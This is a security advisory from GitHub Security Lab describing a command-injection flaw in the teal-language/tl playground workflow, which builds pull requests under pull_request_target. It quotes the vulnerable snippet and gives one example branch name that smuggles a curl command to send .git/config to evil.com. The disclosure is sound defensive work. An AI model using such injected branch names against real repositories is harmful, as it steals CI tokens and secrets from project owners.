The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.
teal-language/tl repository
The latest changeset of playground.yml to the date.
on:
pull_request_target:
branches: [ master ]
...
- name: build
run: |
echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
cd ${{ github.workspace }}/teal-playground
yarn build
This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}#
would exfiltrate the repository token to the attacker controlled server.
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2021-017
in any communication regarding this issue.